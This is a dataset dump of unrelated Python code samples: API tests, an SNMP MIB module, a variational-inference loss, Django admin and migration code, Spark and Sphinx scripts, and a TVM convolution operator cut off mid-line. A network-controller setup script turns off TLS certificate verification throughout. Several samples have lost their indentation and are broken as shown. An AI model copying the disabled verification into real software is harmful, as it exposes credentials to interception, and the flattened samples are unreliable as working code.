| id (string, 1 to 265 chars) | text (string, 6 to 5.19M chars) | dataset_id (7 classes) |
|---|---|---|
# ===== StarcoderdataPython sample 1694871 =====
from test.BaseCase import BaseCase
class TestDeleteMyArticle(BaseCase):

    @BaseCase.login
    def test_ok(self, token):
        self.db.insert({"id": 2, "title": "My title"}, self.db.tables["Article"])
        self.db.insert({"id": 3, "name": "My Company"}, self.db.tables["Company"])
        self.db.insert({"article": 2, "company": 3}, self.db.tables["ArticleCompanyTag"])
        self.db.insert({"user_id": 1, "company_id": 3}, self.db.tables["UserCompanyAssignment"])
        self.db.insert({"property": "ALLOW_ECOSYSTEM_TO_EDIT_ARTICLE", "value": "TRUE"}, self.db.tables["Setting"])
        payload = {"id": 2}
        response = self.application.post('/private/delete_my_article',
                                         headers=self.get_standard_post_header(token),
                                         json=payload)
        self.assertEqual(200, response.status_code)

    @BaseCase.login
    def test_ko_functionality_not_activated(self, token):
        payload = {"id": 2}
        response = self.application.post('/private/delete_my_article',
                                         headers=self.get_standard_post_header(token),
                                         json=payload)
        self.assertEqual("403 The article edition is deactivated", response.status)
        self.assertEqual(self.db.get_count(self.db.tables["Article"]), 0)
        self.assertEqual(self.db.get_count(self.db.tables["ArticleVersion"]), 0)

    @BaseCase.login
    def test_ko_delete_unexisting(self, token):
        self.db.insert({"property": "ALLOW_ECOSYSTEM_TO_EDIT_ARTICLE", "value": "TRUE"}, self.db.tables["Setting"])
        payload = {"id": 2}
        response = self.application.post('/private/delete_my_article',
                                         headers=self.get_standard_post_header(token),
                                         json=payload)
        self.assertEqual("422 Object not found : Article", response.status)

    @BaseCase.login
    def test_ko_article_no_company_assigned(self, token):
        self.db.insert({"id": 2, "title": "My title"}, self.db.tables["Article"])
        self.db.insert({"id": 3, "name": "My Company"}, self.db.tables["Company"])
        self.db.insert({"user_id": 1, "company_id": 3}, self.db.tables["UserCompanyAssignment"])
        self.db.insert({"property": "ALLOW_ECOSYSTEM_TO_EDIT_ARTICLE", "value": "TRUE"}, self.db.tables["Setting"])
        payload = {"id": 2}
        response = self.application.post('/private/delete_my_article',
                                         headers=self.get_standard_post_header(token),
                                         json=payload)
        self.assertEqual("422 Article has no company assigned", response.status)

    @BaseCase.login
    def test_ko_article_too_much_company_assigned(self, token):
        self.db.insert({"id": 2, "title": "My title"}, self.db.tables["Article"])
        self.db.insert({"id": 3, "name": "My Company"}, self.db.tables["Company"])
        self.db.insert({"id": 4, "name": "My Company"}, self.db.tables["Company"])
        self.db.insert({"article": 2, "company": 3}, self.db.tables["ArticleCompanyTag"])
        self.db.insert({"article": 2, "company": 4}, self.db.tables["ArticleCompanyTag"])
        self.db.insert({"property": "ALLOW_ECOSYSTEM_TO_EDIT_ARTICLE", "value": "TRUE"}, self.db.tables["Setting"])
        payload = {"id": 2}
        response = self.application.post('/private/delete_my_article',
                                         headers=self.get_standard_post_header(token),
                                         json=payload)
        self.assertEqual("422 Article has too much companies assigned", response.status)

    @BaseCase.login
    def test_ko_user_not_assigned_to_company(self, token):
        self.db.insert({"id": 2, "title": "My title"}, self.db.tables["Article"])
        self.db.insert({"id": 3, "name": "My Company"}, self.db.tables["Company"])
        self.db.insert({"article": 2, "company": 3}, self.db.tables["ArticleCompanyTag"])
        self.db.insert({"property": "ALLOW_ECOSYSTEM_TO_EDIT_ARTICLE", "value": "TRUE"}, self.db.tables["Setting"])
        payload = {"id": 2}
        response = self.application.post('/private/delete_my_article',
                                         headers=self.get_standard_post_header(token),
                                         json=payload)
        self.assertEqual("422 The user is not assign to the company", response.status)

# ===== StarcoderdataPython sample 1601504 =====
#
# PySNMP MIB module SNMPv2-SMI-v1 (http://snmplabs.com/pysmi)
# ASN.1 source file:///Users/davwang4/Dev/mibs.snmplabs.com/asn1/SNMPv2-SMI-v1
# Produced by pysmi-0.3.4 at Mon Apr 29 17:15:30 2019
# On host DAVWANG4-M-1475 platform Darwin version 18.5.0 by user davwang4
# Using Python version 3.7.3 (default, Mar 27 2019, 09:23:15)
#
Integer, OctetString, ObjectIdentifier = mibBuilder.importSymbols("ASN1", "Integer", "OctetString", "ObjectIdentifier")
NamedValues, = mibBuilder.importSymbols("ASN1-ENUMERATION", "NamedValues")
ValueSizeConstraint, ConstraintsUnion, SingleValueConstraint, ConstraintsIntersection, ValueRangeConstraint = mibBuilder.importSymbols("ASN1-REFINEMENT", "ValueSizeConstraint", "ConstraintsUnion", "SingleValueConstraint", "ConstraintsIntersection", "ValueRangeConstraint")
NotificationGroup, ModuleCompliance = mibBuilder.importSymbols("SNMPv2-CONF", "NotificationGroup", "ModuleCompliance")
MibIdentifier, Counter32, iso, Gauge32, Unsigned32, Bits, TimeTicks, Integer32, Counter64, MibScalar, MibTable, MibTableRow, MibTableColumn, ModuleIdentity, NotificationType, IpAddress, ObjectIdentity = mibBuilder.importSymbols("SNMPv2-SMI", "MibIdentifier", "Counter32", "iso", "Gauge32", "Unsigned32", "Bits", "TimeTicks", "Integer32", "Counter64", "MibScalar", "MibTable", "MibTableRow", "MibTableColumn", "ModuleIdentity", "NotificationType", "IpAddress", "ObjectIdentity")
TextualConvention, DisplayString = mibBuilder.importSymbols("SNMPv2-TC", "TextualConvention", "DisplayString")
class Counter_32(Counter32):
    pass

class Gauge_32(Gauge32):
    pass

class Integer_32(Integer32):
    subtypeSpec = Integer32.subtypeSpec + ValueRangeConstraint(-2147483648, 2147483647)

class Unsigned_32(Gauge32):
    pass
internet = MibIdentifier((1, 3, 6, 1))
directory = MibIdentifier((1, 3, 6, 1, 1))
mgmt = MibIdentifier((1, 3, 6, 1, 2))
experimental = MibIdentifier((1, 3, 6, 1, 3))
private = MibIdentifier((1, 3, 6, 1, 4))
enterprises = MibIdentifier((1, 3, 6, 1, 4, 1))
security = MibIdentifier((1, 3, 6, 1, 5))
snmpV2 = MibIdentifier((1, 3, 6, 1, 6))
snmpDomains = MibIdentifier((1, 3, 6, 1, 6, 1))
snmpProxys = MibIdentifier((1, 3, 6, 1, 6, 2))
snmpModules = MibIdentifier((1, 3, 6, 1, 6, 3))
mibBuilder.exportSymbols("SNMPv2-SMI-v1", Unsigned_32=Unsigned_32, Counter_32=Counter_32, Integer_32=Integer_32, snmpProxys=snmpProxys, experimental=experimental, private=private, snmpModules=snmpModules, snmpV2=snmpV2, security=security, mgmt=mgmt, Gauge_32=Gauge_32, internet=internet, snmpDomains=snmpDomains, enterprises=enterprises, directory=directory)

# ===== StarcoderdataPython sample 3359143 =====
from numbers import Number
from probtorch.util import log_mean_exp
def elbo(q, p, sample_dim=None, batch_dim=None, alpha=0.1,
         size_average=True, reduce=True):
    r"""Calculates an importance weighted Monte Carlo estimate of the
    semi-supervised evidence lower bound (ELBO)

    .. math:: \frac{1}{B} \sum_{b=1}^B
              \log \left[
                \frac{1}{S} \sum_{s=1}^S
                \frac{p(x^{(b)}, y^{(b)}, z^{(s,b)})}
                     {q(z^{(s,b)} | x^{(b)})}
              \right]
              + \frac{\alpha}{B} \sum_{b=1}^B
              \log \left[
                \frac{1}{S} \sum_{s=1}^S
                \frac{q(y^{(b)}, z^{(s,b)} | x^{(b)})}
                     {q(z^{(s,b)} | x^{(b)})}
              \right]

    The sets of variables :math:`x`, :math:`y` and :math:`z` refer to:

    :math:`x`: The set of conditioned nodes that are present in `p` but
    are not present in `q`.

    :math:`y`: The set of conditioned nodes in `q`, which may or may
    not also be present in `p`.

    :math:`z`: The set of sampled nodes present in both `q` and `p`.

    Arguments:
        q(:obj:`Trace`): The encoder trace.
        p(:obj:`Trace`): The decoder trace.
        sample_dim(int, optional): The dimension containing individual samples.
        batch_dim(int, optional): The dimension containing batch items.
        alpha(float, default 0.1): Coefficient for the ML term.
        size_average (bool, optional): By default, the objective is averaged
            over items in the minibatch. When set to false, the objective is
            instead summed over the minibatch.
        reduce (bool, optional): By default, the objective is averaged or
            summed over items in the minibatch. When reduce is False, losses
            are returned without averaging or summation.
    """
    z = [n for n in q.sampled() if n in p]
    log_pxyz = p.log_joint(sample_dim, batch_dim)
    log_qz = q.log_joint(sample_dim, batch_dim, z)
    log_qy = q.log_joint(sample_dim, batch_dim, q.conditioned())
    log_pq = (log_pxyz - log_qz)
    if sample_dim is None:
        objective = log_pq + alpha * log_qy
    else:
        objective = log_mean_exp(log_pq, 0)
        if not isinstance(log_qy, Number):
            objective = objective + alpha * log_mean_exp(log_qy, 0)
    if reduce:
        objective = objective.mean() if size_average else objective.sum()
    return objective
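
# Minimal usage sketch (assumption: `q` and `p` are probtorch Trace objects
# produced by an encoder/decoder pair; the names `encoder`, `decoder`, `x`
# below are hypothetical and not defined in this module):
#
#   q = encoder(x, num_samples=8)     # encoder trace, samples stacked on dim 0
#   p = decoder(x, q=q)               # decoder trace conditioned on q
#   loss = -elbo(q, p, sample_dim=0, batch_dim=1, alpha=0.1)
#   loss.backward()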

# ===== StarcoderdataPython sample 4822614 =====
# Generated by Django 2.0.2 on 2018-03-01 02:44
from django.db import migrations, models


class Migration(migrations.Migration):

    dependencies = [
        ('finances', '0002_auto_20180227_2101'),
    ]

    operations = [
        migrations.AlterField(
            model_name='customer',
            name='address_line_2',
            field=models.CharField(blank=True, max_length=50, null=True),
        ),
    ]

# ===== StarcoderdataPython sample 3221706 =====
import requests
import json
import sys
import urllib3
import time
#import re
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
ctrl=sys.argv[1]
priv_ip=sys.argv[2]
copilot=sys.argv[3]
pw=sys.argv[4]
version=sys.argv[5]
customer_id=sys.argv[6]
cplt_license=sys.argv[7]
email_address=sys.argv[8]
url = "https://%s/v1/backend1" % (ctrl)
url2 = "https://%s/v1/api" % (ctrl)
# the initial admin password is the controller's private IP (assumption: the
# redacted <PASSWORD> placeholder stood for the priv_ip variable, matching the
# old_password used further down)
get_cid = {"action": "login_proc", "username": "admin", "password": priv_ip}
# Wait for the Controller API
r = None
while r is None:
    try:
        r = requests.post(url, data=get_cid, verify=False)
    except:
        pass
dict = json.loads(r.text)
print(r.text)
add_email = {"action": "add_admin_email_addr", "admin_email": email_address, "CID": dict['CID']}
r = requests.post(url2, data=add_email, verify=False)
print(r.text)
change_pw = {"action": "edit_account_user", "what": "password", "username": "admin", "old_password": priv_ip, "new_password": pw, "CID": dict['CID']}
r = requests.post(url2, data=change_pw, verify=False)
print(r.text)
random_step = {"action": "setup_network_options", "subaction": "cancel", "CID": dict['CID']}
r = requests.post(url2, data=random_step, verify=False)
print(r.text)
upgrade = {"action": "upgrade", "CID": dict['CID'], "version": version}
r = requests.post(url2, data=upgrade, verify=False)
print(r.text)
# Set Co-Pilot Password and License
s = requests.Session()
set_copilot = {"controllerIp": ctrl, "username": "admin", "password": pw}
cplt_url = 'https://%s/login' % (copilot)
r = s.post(cplt_url, data=set_copilot, verify=False)
cplt_url = 'https://%s/setlicense' % (copilot)
set_cplt_license = {"customerId": cplt_license}
r = s.post(cplt_url, data=set_cplt_license, verify=False)
print(r.text)
## Upload cert and key CoPilot
cplt_url = 'https://%s/addcertificate' % (copilot)
files = {'certificate': open('certificate.pem', 'rb'), 'certificateKey': open('private_key.pem', 'rb')}
r = s.post(cplt_url, files=files, verify=False)
print(r.text)
## Restart webapp
cplt_url = 'https://%s/services/restart/web' % (copilot)
try:
    r = s.get(cplt_url, verify=False)
except Exception:
    pass
# Set Netflow Agent on Controller
get_cid = {"action": "login_proc", "username": "admin", "password": pw}
r = requests.post(url, data=get_cid, verify=False)
dict = json.loads(r.text)
print(r.text)
enable_netflow = {"action": "enable_netflow_agent", "CID": dict['CID'], "server_ip": copilot, "port": "31283", "version": "9", "exclude_gateway_list": ""}
r = requests.post(url2, data=enable_netflow, verify=False)
print(r.text)
set_customer_id = {"action": "setup_customer_id", "CID": dict['CID'], "customer_id": customer_id}
r = requests.post(url2, data=set_customer_id, verify=False)
print(r.text)
## Upload Controller cert
file_list = [
('ca_cert', ('ca_cert.pem', open('./ca_cert.pem', 'r'), 'txt/txt')),
('server_cert', ('certificate.pem', open('./certificate.pem', 'r'), 'txt/txt')),
('private_key', ('private_key.pem', open('./private_key.pem', 'r'), 'txt/txt'))
]
data = {"action": "import_new_https_certs", "CID": dict['CID']}
r = requests.post(url2, data=data, files=file_list, verify=False)
print(r.text)

# ===== StarcoderdataPython sample 101320 (repo: pmacosta/pplot, 1-10 stars) =====
# compat2.py
# Copyright (c) 2013-2019 <NAME>
# See LICENSE for details
# pylint: disable=C0111,R1717,W0122,W0613
###
# Functions
###
def _readlines(fname): # pragma: no cover
"""Read all lines from file."""
with open(fname, "r") as fobj:
return fobj.readlines()
# Largely from From https://stackoverflow.com/questions/956867/
# how-to-get-string-objects-instead-of-unicode-ones-from-json-in-python
# with Python 2.6 compatibility changes
def _unicode_to_ascii(obj): # pragma: no cover
"""Convert to ASCII."""
# pylint: disable=E0602
if isinstance(obj, dict):
return dict(
[
(_unicode_to_ascii(key), _unicode_to_ascii(value))
for key, value in obj.items()
]
)
if isinstance(obj, list):
return [_unicode_to_ascii(element) for element in obj]
if isinstance(obj, unicode):
return obj.encode("utf-8")
return obj
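# Usage sketch for _unicode_to_ascii (Python 2 only, since it relies on the
# builtin `unicode` type; the sample value is illustrative):
#
#   _unicode_to_ascii({u"key": [u"value", 1]})   # -> {'key': ['value', 1]}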
def _write(fobj, data):
"""Write data to file."""
fobj.write(data)

# ===== StarcoderdataPython sample 3264534 (file: crawler/admin.py) =====
import csv
import datetime
import string
from django.contrib import admin
from admin_auto_filters.filters import AutocompleteFilter
from django.http import HttpResponse
from crawler.models import Medicine, Generic, Manufacturer, DosageForm, Indication, DrugClass
# change selection list count
# https://stackoverflow.com/questions/36474515/how-to-get-filtered-queryset-in-django-admin/36476084#36476084
# filtering
# https://gist.github.com/ahmedshahriar/4240f0451261c4bb8364dd5341c7cf59
# https://books.agiliq.com/projects/django-admin-cookbook/en/latest/filtering_calculated_fields.html
class AlphabetFilter(admin.SimpleListFilter):
title = 'Name Alphabetically'
parameter_name = 'alphabet'
def lookups(self, request, model_admin):
abc = list(string.ascii_lowercase)
return ((c.upper(), c.upper()) for c in abc)
def queryset(self, request, queryset):
if self.value() and (queryset.model is Medicine):
return queryset.filter(brand_name__startswith=self.value())
if self.value() and (queryset.model is Generic):
return queryset.filter(generic_name__startswith=self.value())
if self.value() and (queryset.model is Manufacturer):
return queryset.filter(manufacturer_name__startswith=self.value())
class MedicineItemInline(admin.StackedInline):
model = Medicine
class GenericItemInline(admin.TabularInline):
model = Generic
def export_to_csv(model_admin, request, queryset):
opts = model_admin.model._meta
content_disposition = f'attachment; filename={opts.verbose_name}.csv'
response = HttpResponse(content_type='text/csv')
response['Content-Disposition'] = content_disposition
writer = csv.writer(response)
fields = [field for field in opts.get_fields() if not field.many_to_many \
and not field.one_to_many]
# Write a first row with header information
writer.writerow([field.verbose_name for field in fields])
# Write data rows
for obj in queryset:
data_row = []
for field in fields:
value = getattr(obj, field.name)
if isinstance(value, datetime.datetime):
value = value.strftime('%d/%m/%Y')
data_row.append(value)
writer.writerow(data_row)
return response
export_to_csv.short_description = 'Export to CSV'
class GenericFilter(AutocompleteFilter):
title = 'Generic' # display title
field_name = 'generic' # name of the foreign key field
@admin.register(Medicine)
class MedicineAdmin(admin.ModelAdmin):
list_display = ('brand_id', 'brand_name', 'dosage_form', 'generic', 'manufacturer', 'type')
list_filter = (GenericFilter, AlphabetFilter, 'type', 'created', 'dosage_form', )
search_fields = ('brand_name', 'dosage_form')
prepopulated_fields = {'slug': ('brand_name',)}
raw_id_fields = ('generic', 'manufacturer')
date_hierarchy = 'created'
ordering = ('created',)
actions = [export_to_csv]
@admin.register(Generic)
class GenericAdmin(admin.ModelAdmin):
list_display = ('generic_id', 'generic_name', 'monograph_link', 'drug_class', 'indication', 'descriptions_count')
list_filter = ('created', 'descriptions_count', AlphabetFilter)
search_fields = ('generic_name',)
prepopulated_fields = {'slug': ('generic_name',)}
raw_id_fields = ('drug_class', 'indication')
date_hierarchy = 'created'
ordering = ('created',)
actions = [export_to_csv]
# readonly_fields = ('desc_count',) # add `desc_count` to list_display to display the number of descriptions
# https://books.agiliq.com/projects/django-admin-cookbook/en/latest/filtering_calculated_fields.html
@admin.register(Manufacturer)
class ManufacturerAdmin(admin.ModelAdmin):
list_display = ('manufacturer_id', 'manufacturer_name', 'generics_count', 'brand_names_count')
list_filter = ('created', AlphabetFilter,)
search_fields = ('manufacturer_name',)
prepopulated_fields = {'slug': ('manufacturer_name',)}
date_hierarchy = 'created'
ordering = ('created',)
actions = [export_to_csv]
inlines = [MedicineItemInline]
@admin.register(DosageForm)
class DosageFormAdmin(admin.ModelAdmin):
list_display = ('dosage_form_id', 'dosage_form_name', 'brand_names_count')
list_filter = ('created', AlphabetFilter,)
search_fields = ('dosage_form_name',)
prepopulated_fields = {'slug': ('dosage_form_name',)}
date_hierarchy = 'created'
ordering = ('created',)
actions = [export_to_csv]
@admin.register(Indication)
class IndicationAdmin(admin.ModelAdmin):
list_display = ('indication_id', 'indication_name', 'generics_count')
list_filter = ('created', AlphabetFilter,)
search_fields = ('indication_name',)
prepopulated_fields = {'slug': ('indication_name',)}
date_hierarchy = 'created'
ordering = ('created',)
actions = [export_to_csv]
inlines = [GenericItemInline]
@admin.register(DrugClass)
class DrugClassAdmin(admin.ModelAdmin):
list_display = ('drug_class_id', 'drug_class_name', 'generics_count')
list_filter = ('created', AlphabetFilter,)
search_fields = ('drug_class_name',)
prepopulated_fields = {'slug': ('drug_class_name',)}
date_hierarchy = 'created'
ordering = ('created',)
actions = [export_to_csv]

# ===== StarcoderdataPython sample 3247221 =====
#!/bin/env python
import libsedml
def create_nested_algorithm_example(file_name):
doc = libsedml.SedDocument(1, 4)
# create simulation
tc = doc.createUniformTimeCourse()
tc.setId("sim1")
tc.setInitialTime(0.0)
tc.setOutputStartTime(0.0)
tc.setOutputEndTime(10.0)
tc.setNumberOfPoints(1000)
# need to set the correct KISAO Term
alg = tc.createAlgorithm()
alg.setKisaoID("KISAO:0000352")
alg.setNotes("<p xmlns='http://www.w3.org/1999/xhtml'>a hybrid algorithm</p>")
p = alg.createAlgorithmParameter()
p.setKisaoID("KISAO:0000203")
p.setNotes("<p xmlns='http://www.w3.org/1999/xhtml'>particle number lower limit</p>")
p.setValue('2000')
p1 = p.createAlgorithmParameter()
p1.setKisaoID("KISAO:0000029")
p1.setNotes("<p xmlns='http://www.w3.org/1999/xhtml'>Gillespie Parameter here</p>")
p1.setValue('something')
p1 = p.createAlgorithmParameter()
p1.setKisaoID("KISAO:0000089")
p1.setNotes("<p xmlns='http://www.w3.org/1999/xhtml'>LSODA parameter here</p>")
p1.setValue('something else')
# write doc
libsedml.writeSedML(doc, file_name)
if __name__ == "__main__":
create_nested_algorithm_example('nested_example.xml')

# ===== StarcoderdataPython sample 19147 =====
import re
import string
import sys
from pyspark import SparkContext
exclude = set(string.punctuation)
def get_hash_tag(word, rmPunc):
    pattern = re.compile("^#(.*)")
    m = pattern.match(word)
    tag = None
    if m:
        match = m.groups()
        for m_word in match:
            tag = ''.join(letter for letter in m_word if letter not in rmPunc)
    if tag is not None:
        return tag
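
# Quick check of the helper (punctuation is stripped from the matched tag):
#
#   get_hash_tag("#BigData!", set(string.punctuation))   # -> "BigData"
#   get_hash_tag("notatag", set(string.punctuation))     # -> None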
sc = SparkContext("local", "Finding Hash Tags")
rmPunc = sc.broadcast(exclude)
mydata = sc.textFile("hdfs://<hostname>:<port>/path/to/parsedata<first job output>")
wordsRDD = mydata.flatMap( lambda line : line.split("\t")[1].split(" "))
tagsRDD = wordsRDD.map( lambda word : get_hash_tag(word, rmPunc.value))
hashtagsRDD = tagsRDD.filter( lambda word : word is not None)
hashtagsRDD.saveAsTextFile("hdfs://<hostname>:<port>/path/to/hashtags")

# ===== StarcoderdataPython sample 148938 (0 stars) =====
# Helper script to automatically create the doc folder
# Author: <NAME>
#
# Imports
#
import os
import shutil
from typing import List
#
# Constants
#
PROJECT: str = "py_crypto_hd_wallet"
DOC_FOLDER: str = os.path.join(".", PROJECT)
SRC_FOLDER: str = os.path.join("..", PROJECT)
DOC_EXT: str = ".rst"
SRC_EXT: str = ".py"
DOC_INDEX_FILE: str = "index" + DOC_EXT
UNDERLINE_CHAR: str = "="
TOCTREE_MAX_DEPTH: int = 10
DOC_FILE_TEMPLATE: str = """{module_name}
{title_underline}
.. automodule:: {module_path}
:members:
:undoc-members:
:show-inheritance:
"""
DOC_INDEX_TEMPLATE: str = """{index_name}
{title_underline}
.. toctree::
:maxdepth: {toctree_max_depth}
{modules_list}
"""
#
# Functions
#
def create_doc_main_dir() -> None:
shutil.rmtree(DOC_FOLDER, ignore_errors=True)
os.mkdir(DOC_FOLDER)
def is_dir_empty(d: str) -> bool:
return listdir_dirs(d) == [] and listdir_files(d) == []
def is_dir_valid(d: str) -> bool:
return not os.path.basename(d).startswith(("__", "."))
def is_file_valid(f: str) -> bool:
return not os.path.basename(f).startswith(("_", ".")) and f.find(SRC_EXT) != -1
def listdir_files(d: str) -> List[str]:
elems = [os.path.join(d, e) for e in os.listdir(d)]
return [e for e in elems
if os.path.isfile(e) and is_file_valid(e)]
def listdir_dirs(d: str) -> List[str]:
elems = [os.path.join(d, e) for e in os.listdir(d)]
return [e for e in elems
if os.path.isdir(e) and is_dir_valid(e) and not is_dir_empty(e)]
def src_to_doc_path(p: str) -> str:
return p.replace(SRC_FOLDER, DOC_FOLDER)
def src_to_doc_file(f: str) -> str:
return src_to_doc_path(f).replace(SRC_EXT, DOC_EXT)
def create_doc_dir(d: str) -> None:
doc_dir = src_to_doc_path(d)
os.mkdir(doc_dir)
print(f"Create doc directory: {doc_dir}")
def get_index_name(f: str) -> str:
return os.path.basename(f)
def get_index_modules_list(dirs: List[str], files: List[str]) -> str:
elems = list(map(lambda f: " " + get_module_name(f) + "/" + DOC_INDEX_FILE, dirs)) + \
list(map(lambda f: " " + get_module_name(f), files))
elems.sort()
return "\n".join(elems)
def get_module_name(f: str) -> str:
return os.path.basename(f).replace(DOC_EXT, "").replace(SRC_EXT, "")
def get_module_path(f: str) -> str:
return PROJECT + "." + f.replace(DOC_EXT, "").replace(DOC_FOLDER, "").replace("/", ".").replace("\\", ".")[1:]
def get_title_underline(m: str) -> str:
return UNDERLINE_CHAR * len(m)
def create_doc_file(f: str) -> None:
doc_file = src_to_doc_file(f)
with open(doc_file, "w") as fout:
module_name = get_module_name(doc_file)
fout.write(DOC_FILE_TEMPLATE.format(module_name=module_name,
title_underline=get_title_underline(module_name),
module_path=get_module_path(doc_file)))
print(f"Create doc file: {doc_file}")
def create_doc_index(d: str, dirs: List[str], files: List[str]) -> None:
if len(dirs) == 0 and len(files) == 0:
return
index_file = os.path.join(src_to_doc_path(d), DOC_INDEX_FILE)
with open(index_file, "w") as fout:
index_name = get_index_name(d)
fout.write(DOC_INDEX_TEMPLATE.format(index_name=index_name,
title_underline=get_title_underline(index_name),
toctree_max_depth=TOCTREE_MAX_DEPTH,
modules_list=get_index_modules_list(dirs, files)))
print(f"Create index file: {index_file}")
def create_doc(d: str) -> None:
files = listdir_files(d)
dirs = listdir_dirs(d)
for f in files:
create_doc_file(f)
create_doc_index(d, dirs, files)
for d in dirs:
create_doc_dir(d)
create_doc(d)
#
# Script
#
create_doc_main_dir()
create_doc(SRC_FOLDER)
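
# Illustrative sketch of what create_doc_file() writes for a hypothetical module
# SRC_FOLDER/wallet.py, following DOC_FILE_TEMPLATE above (directive options
# indented as Sphinx expects):
#
#   wallet
#   ======
#
#   .. automodule:: py_crypto_hd_wallet.wallet
#       :members:
#       :undoc-members:
#       :show-inheritance: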

# ===== StarcoderdataPython sample 1763493 (file: api_test_utils/env.py) =====
import os
def api_env() -> str:
    env = os.environ.get('APIGEE_ENVIRONMENT', 'internal-dev').strip().lower()
    return env


def api_base_domain() -> str:
    env = os.environ.get('API_BASE_DOMAIN', 'api.service.nhs.uk').strip().lower()
    return env


def api_host(
    env: str = None, base_domain: str = None
) -> str:
    env = (env or api_env()).strip().lower()
    base_domain = (base_domain or api_base_domain()).strip().lower()
    host = (base_domain if env == 'prod' else f'{env}.{base_domain}').lower().strip()
    return host


def api_base_path() -> str:
    base_path = os.environ.get('SERVICE_BASE_PATH', '').strip().strip('/')
    return base_path


def api_base_uri(
    host: str = None, env: str = None, base_path: str = None, base_domain: str = None
) -> str:
    env = (env or api_env()).strip().lower()
    base_path = (base_path or api_base_path()).strip().strip('/')
    host = (host or api_host(env=env, base_domain=base_domain)).lower().strip().strip('/')
    base_uri = os.path.join(f"https://{host}", base_path)
    return base_uri


def source_commit_id():
    return os.environ.get('SOURCE_COMMIT_ID', 'not-set')


def status_endpoint_api_key():
    return os.environ.get('STATUS_ENDPOINT_API_KEY', 'not-set')
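
# Usage sketch (assumed environment values, not part of this module): with
# APIGEE_ENVIRONMENT=internal-dev, API_BASE_DOMAIN=api.service.nhs.uk and
# SERVICE_BASE_PATH=hello-world, the helpers compose as follows:
#
#   api_host()      -> "internal-dev.api.service.nhs.uk"
#   api_base_uri()  -> "https://internal-dev.api.service.nhs.uk/hello-world"
#
# In the "prod" environment the prefix is dropped, giving
# "https://api.service.nhs.uk/hello-world".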

# ===== StarcoderdataPython sample 1620827 =====
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
# pylint: disable=invalid-name, unused-variable
"""Transposed 2D convolution operators (sometimes called Deconvolution)."""
from __future__ import absolute_import as _abs
import tvm
from tvm import te
from tvm import autotvm
from ..nn import dilate, pad, get_pad_tuple
from ..util import get_const_tuple, traverse_inline
from .conv2d_spatial_pack import schedule_conv2d_spatial_pack_nchw
@autotvm.register_topi_compute("conv2d_transpose_nchw.arm_cpu")
def conv2d_transpose_nchw(cfg, Input, Filter, strides, padding, out_dtype,
output_padding):
"""Transposed 2D convolution nchw forward operator.
Parameters
----------
Input : tvm.te.Tensor
4-D with shape [batch, in_channel, in_height, in_width]
Filter : tvm.te.Tensor
4-D with shape [in_channel, num_filter, filter_height, filter_width]
strides : tuple of two ints
The spatial stride along height and width
padding : int or str
Padding size, or ['VALID', 'SAME']
out_dtype: str
The output data type. This is used for mixed precision.
output_padding : tuple of int
Used to get the right output shape in gradients
Returns
-------
Output : tvm.te.Tensor
4-D with shape [batch, out_channel, out_height, out_width]
"""
return _decl_spatial_pack(cfg, Input, Filter, strides, padding, "NCHW", out_dtype, 2,
output_padding)
def _decl_spatial_pack(cfg, data, kernel, strides, padding, layout, out_dtype, num_tile,
output_padding):
assert layout == "NCHW", "Only support NCHW"
out_dtype = out_dtype or data.dtype
N, CI, IH, IW = get_const_tuple(data.shape)
_, CO, KH, KW = get_const_tuple(kernel.shape)
HSTR, WSTR = strides if isinstance(strides, (tuple, list)) else (strides, strides)
opad_h, opad_w = output_padding
assert opad_h < HSTR and opad_w < WSTR
pad_top, pad_left, pad_bottom, pad_right = get_pad_tuple(padding, (KH, KW))
bpad_top, bpad_bottom = KH - 1 - pad_top, KH - 1 - pad_bottom + opad_h
bpad_left, bpad_right = KW - 1 - pad_left, KW - 1 - pad_right + opad_w
OH = (IH - 1) * HSTR - pad_top - pad_bottom + KH + opad_h
OW = (IW - 1) * WSTR - pad_left - pad_right + KW + opad_w
dilated_input = dilate(data, [1, 1, HSTR, WSTR])
data_pad = pad(dilated_input, [0, 0, bpad_top, bpad_left], [0, 0, bpad_bottom, bpad_right])
# ==================== define configuration space ====================
n, co, oh, ow = cfg.axis(N), cfg.axis(CO), cfg.axis(OH), cfg.axis(OW)
ci, kh, kw = cfg.reduce_axis(CI), cfg.reduce_axis(KH), cfg.reduce_axis(KW)
if num_tile == 2: # for arm cpu
co, vc = cfg.define_split('tile_co', co, num_outputs=2)
oh, vh = cfg.define_split('tile_oh', oh, num_outputs=2)
ow, vw = cfg.define_split('tile_ow', ow, num_outputs=2)
elif num_tile == 3: # for mali gpu
co, _, vc = cfg.define_split('tile_co', co, num_outputs=3)
oh, _, vh = cfg.define_split('tile_oh', oh, num_outputs=3)
ow, _, vw = cfg.define_split('tile_ow', ow, num_outputs=3)
else:
raise RuntimeError("Invalid num_tile")
cfg.define_reorder("reorder_0",
[n, co, oh, ow, ci, kh, kw, vh, vw, vc],
policy='candidate', candidate=[
[n, co, oh, ow, ci, kh, kw, vh, vw, vc],
[n, co, oh, ow, ci, kh, kw, vc, vh, vw]])
cfg.define_annotate("ann_reduce", [kh, kw], policy='try_unroll')
cfg.define_annotate("ann_spatial", [vh, vw, vc], policy='try_unroll_vec')
# ====================================================================
VC = cfg["tile_co"].size[-1]
VH = cfg["tile_oh"].size[-1]
VW = cfg["tile_ow"].size[-1]
dvshape = (N, OH // VH, OW // VW, CI, VH + KH-1, VW + KW-1)
kvshape = (CO // VC, CI, KH, KW, VC)
ovshape = (N, CO // VC, OH // VH, OW // VW, VH, VW, VC)
oshape = (N, CO, OH, OW)
data_vec = te.compute(dvshape, lambda n, h, w, ci, vh, vw:
data_pad[n][ci][h*VH + vh][w*VW + vw],
name='data_vec')
kernel_vec = te.compute(kvshape, lambda co, ci, kh, kw, vc:
kernel[ci][co*VC+vc][kh][kw],
name='kernel_vec_conv2d_transpose')
ci = te.reduce_axis((0, CI), name='ci')
kh = te.reduce_axis((0, KH), name='kh')
kw = te.reduce_axis((0, KW), name='kw')
conv = te.compute(ovshape, lambda n, co, h, w, vh, vw, vc: \
